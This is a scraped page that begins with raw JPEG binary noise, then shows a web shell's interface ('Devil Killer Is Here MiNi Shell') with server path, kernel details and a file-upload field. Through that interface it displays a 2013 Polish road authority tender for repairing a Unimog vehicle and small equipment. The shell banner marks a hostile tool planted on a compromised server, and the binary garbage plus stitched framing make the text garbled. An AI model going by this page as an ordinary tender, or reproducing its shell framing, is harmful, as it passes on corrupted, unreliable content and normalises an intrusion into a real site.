JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130513/73549-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Usługi w zakresie napraw i konserwacji pojazdu specjalistycznego typu UNIMOG oraz  
sprzętu przewidzianego do konserwacji i usuwania awarii wraz z dostawą części    
zamiennych. Sprzęt jest  własnością  - RDW Toruń,  zamówienie  podzielono na 2 części.</b><br>
<b>Numer ogłoszenia: 73549 - 2013; data zamieszczenia: 13.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie napraw i konserwacji pojazdu specjalistycznego typu UNIMOG oraz  
sprzętu przewidzianego do konserwacji i usuwania awarii wraz z dostawą części    
zamiennych. Sprzęt jest  własnością  - RDW Toruń,  zamówienie  podzielono na 2 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2.1.  części nr 1 - usługi w zakresie naprawy i konserwacji pojazdu specjalistycznego         
               typu Mercedes - Benz UNIMOG  - bez osprzętu współpracującego:
1. 	naprawy bieżące -awaryjne, wynikające z eksploatacji pojazdu -orientacyjna, planowana ilość r-g warsztatowych wynosi 150,
      - Mercedes - Benz Unimog U 300 o numerze rejestracyjnym CB 3118N, 

3.2.2. Realizacja zamówienia:
1. W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą one być            wykonane tylko za zgodą Zamawiającego.
2. Wykonawca wykona bieżące naprawy w ciągu 5 dni roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między stronami.
3. Każdorazowo zostanie udzielone zlecenie określające zakres naprawy w  pojeździe.
4.   W przypadku awarii pojazdu Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy pojazdów do odebrania z miejsca wskazanego przez Zamawiającego danego pojazdu w ciągu  24 godzin od momentu wydania polecenia, przetransportowania danego pojazdu do miejsca wykonania naprawy na własny koszt i ryzyko.  
5. Obowiązkiem Wykonawcy będzie zapewnienie części zamiennych i materiałów               eksploatacyjnych niezbędnych do prawidłowego wykonania przedmiotu zamówienia. 
4.5. Po wykonaniu usługi Wykonawca dostarczy Zamawiającemu zestawienie wykonanych prac przy danym pojeździe oraz rozliczy wykonanie usługi w oparciu o katalog norm              czasowych dla Zakładów Rzemieślniczych Branży Motoryzacyjnej zrzeszonych w Cechach              Rzemiosł Różnych lub nieznacznie odbiegający od tych norm.

3.2.3. Wymagania  
Wykonawca powinien posiadać kadrę pracowniczą i zaplecze techniczne umożliwiające              samodzielne wykonanie obsługi pojazdu w zakresie:
- pełnej diagnostyki;
- elektronicznym;
- elektromechanicznym;
- mechanicznym.

3.2.4. Rękojmia i gwarancja
1. Wykonawca udzieli rękojmi i gwarancji na wykonaną usługę na okres minimum 6 miesięcy oraz na użyte części do napraw na okres gwarancji zgodny z udzieloną gwarancją  producenta. 
2. Wady w realizacji zamówienia winny być nieodpłatnie usunięte w terminie 14 dni od dnia otrzymania zgłoszenia wystąpienia wady. Zamawiający dopuszcza wydłużenie terminu                   realizacji tylko w szczególnie uzasadnionych przypadkach. 


3.3. 	części nr 2 - usługi w zakresie naprawy i konserwacji  sprzętu 
- naprawa sprzętu wg ilości i stawki r-g orientacyjna, planowana ilość r-g   warsztatowych wynosi 100, 

Sprzęt przewidziany do konserwacji i usuwania awarii:
- Piły spalinowe typu Stihl, Husgvarna          		- 5 szt.,
- Kosy spalinowe typu Stihl 					- 4 szt., 
- Podkrzesywarki typu Stihl 					- 2 szt., 

- Zagęszczarka spalinowa ZGS - 12 				- 1 szt., 
- Zagęszczarka płytowa CF1 					- 1 szt., 
- Agregaty prądotwórcze FOGO      				- 2 szt., 
- Wiertnica glebowa Stihl  					- 1 szt., 

3.3.1.	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
3.3.2 	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3.3.3. Koszt użytych do napraw materiałów i części nie będzie obciążał ceny umownej.
3.3.4. Ceny materiałów nie mogą odbiegać od średnich notowań rynkowych. 
3.3.5.  1. Wykonawca udzieli rękojmi i gwarancji na wykonaną usługę na okres minimum 6 miesięcy oraz na użyte części do napraw na okres gwarancji zgodny z udzieloną  gwarancją  producenta. 
2. Wady w realizacji zamówienia winny być nieodpłatnie usunięte w terminie 14 dni od dnia otrzymania zgłoszenia wystąpienia wady. Zamawiający dopuszcza wydłużenie terminu reali-zacji tylko w szczególnie uzasadnionych przypadkach. 
3.3.6 	Wykonawca dokona przeglądu, wymiany na wyłącznie fabrycznie nowe części zużytych -uszkodzonych i oleju lub naprawy części zużytych- uszkodzonych, na podstawie szczegółowej specyfikacji kosztów, którą zatwierdzi Zamawiający, i dołączy ją do faktury.
3.3.7.  Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za  realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź  konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze, o ile nie zostaną ustalone inne terminy na początku polecenia .

! Istnieje możliwość zwiększenia lub zmniejszenia środków transportu lub sprzętu przewidzianych do naprawy w roku 2013..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają 
warunki, o których mowa w art. 22 ust. 1 ustawy Pzp i którzy wykażą ich 
spełnienie na poziomie wymaganym przez Zamawiającego, zgodnie z opisem zmieszczonym w pkt 5.3. oraz nie podlegają wykluczeniu z powodu warunków, 
o których mowa w art. 24 ust. 1 ustawy Pzp.
5.2.	Wykonawcy biorący udział w postępowaniu, muszą spełnić następujące warunki 
udziału w postępowaniu i potwierdzić ich spełnienie wskazanymi dokumentami.
5.3.	Zgodnie z art. 22 ust. 1 o udzielenie zamówienia mogą ubiegać się Wykonawcy, 
którzy spełniają warunki, dotyczące:
5.3.1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania 
warunków w tym zakresie. Zamawiający dokona oceny spełniania 
warunków udziału w postępowaniu w tym zakresie na podstawie 
oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1. SIWZ.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na 
podstawie oświadczeń i dokumentów, o których mowa w pkt 6 SIWZ wg formuły SPEŁ-NIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.3.2. 	posiadania wiedzy i doświadczenia:
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania 
warunków w tym zakresie. Zamawiający dokona oceny spełniania 
warunków udziału w postępowaniu w tym zakresie na podstawie 
oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1. SIWZ
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na 
podstawie oświadczeń i dokumentów, o których mowa w pkt 6 SIWZ wg formuły SPEŁ-NIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Potencjał techniczny
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania 
warunków w tym zakresie. Zamawiający dokona oceny spełniania 
warunków udziału w postępowaniu w tym zakresie na podstawie 
oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na 
podstawie oświadczeń i dokumentów, o których mowa w pkt 6 SIWZ wg formuły SPEŁ-NIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Potencjał techniczny
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania 
warunków w tym zakresie. Zamawiający dokona oceny spełniania 
warunków udziału w postępowaniu w tym zakresie na podstawie 
oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na 
podstawie oświadczeń i dokumentów, o których mowa w pkt 6 SIWZ wg formuły SPEŁ-NIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.3.4 sytuacji ekonomicznej i finansowej:
O zamówienie mogą ubiegać się Wykonawcy dysponujący 
ubezpieczeniem OC. Wykonawca w celu spełnienia warunku musi wykazać, iż posiada opła-coną polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 10 000,00 zł.
5.4 Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym lub oso-bach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szcze-gólności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia (oryginał lub kopia poświadczona notarialnie). 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na 
podstawie oświadczeń i dokumentów, o których mowa w pkt 6 SIWZ wg formuły SPEŁ-NIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1. Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której 
dokonano wyboru wykonawcy (w formie aneksu), w przypadku wystąpienia 
co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem 
podawanych warunków ich wprowadzenia: 
16.1.1.   Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę pod wykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu za-mówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji usług. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedy-nie, jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne.
16.1.2. Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie                 i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy,           a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
16.1.3. Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
16.1.4.	Zmiany wynagrodzenia w przypadku:
       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
16.1.5. Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 k.c. - Jeżeli                 z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone  z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania 
zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy
16.1.6. Inne przyczyny zewnętrzne niezależne od zamawiającego i wykonawcy skutkujące niemożliwością wykonania przedmiotu zamówienia.
16.2. Wszystkie powyższe postanowienia w podpunktach 16.1.1 - 16.1.6 stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
16.3. Natomiast nie stanowi zmiany umowy w rozumieniu art. 144 ustawy p.z.p.:
16.3.1.Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego);
16.3.2. Zmiana danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Toruniu
  ul. Polna 113; 87-100 Toruń,
Tel. 56/66-44-035.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 09:45, miejsce: Rejon Dróg Wojewódzkich w Toruniu
  ul. Polna 113; 87-100 Toruń,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> części nr 1 - usługi w zakresie naprawy i konserwacji pojazdu specjalistycznego         
               typu Mercedes - Benz UNIMOG  ( bez osprzętu współpracującego):.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	naprawy bieżące (awaryjne) wynikające z eksploatacji pojazdu (orientacyjna, planowana ilość r-g warsztatowych wynosi 150),
      - Mercedes - Benz Unimog U 300 o numerze rejestracyjnym CB 3118N, 

3.2.2. Realizacja zamówienia:
1. W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą one być            wykonane tylko za zgodą Zamawiającego.
2. Wykonawca wykona bieżące naprawy w ciągu 5 dni roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między stronami.
3. Każdorazowo zostanie udzielone zlecenie określające zakres naprawy w  pojeździe.
4.   W przypadku awarii pojazdu Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy pojazdów do odebrania z miejsca wskazanego przez Zamawiającego danego pojazdu w ciągu  24 godzin od momentu wydania polecenia, przetransportowania danego pojazdu do miejsca wykonania naprawy na własny koszt i ryzyko.  
5. Obowiązkiem Wykonawcy będzie zapewnienie części zamiennych i materiałów               eksploatacyjnych niezbędnych do prawidłowego wykonania przedmiotu zamówienia. 
4.5. Po wykonaniu usługi Wykonawca dostarczy Zamawiającemu zestawienie wykonanych prac przy danym pojeździe oraz rozliczy wykonanie usługi w oparciu o katalog norm              czasowych dla Zakładów Rzemieślniczych Branży Motoryzacyjnej zrzeszonych w Cechach              Rzemiosł Różnych lub nieznacznie odbiegający od tych norm.

3.2.3. Wymagania  
Wykonawca powinien posiadać kadrę pracowniczą i zaplecze techniczne umożliwiające              samodzielne wykonanie obsługi pojazdu w zakresie:
- pełnej diagnostyki;
- elektronicznym;
- elektromechanicznym;
- mechanicznym.

3.2.4. Rękojmia i gwarancja
1. Wykonawca udzieli rękojmi i gwarancji na wykonaną usługę na okres minimum 6 miesięcy oraz na użyte części do napraw na okres gwarancji zgodny z udzieloną gwarancją  producenta. 
2. Wady w realizacji zamówienia winny być nieodpłatnie usunięte w terminie 14 dni od dnia otrzymania zgłoszenia wystąpienia wady. Zamawiający dopuszcza wydłużenie terminu                   realizacji tylko w szczególnie uzasadnionych przypadkach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
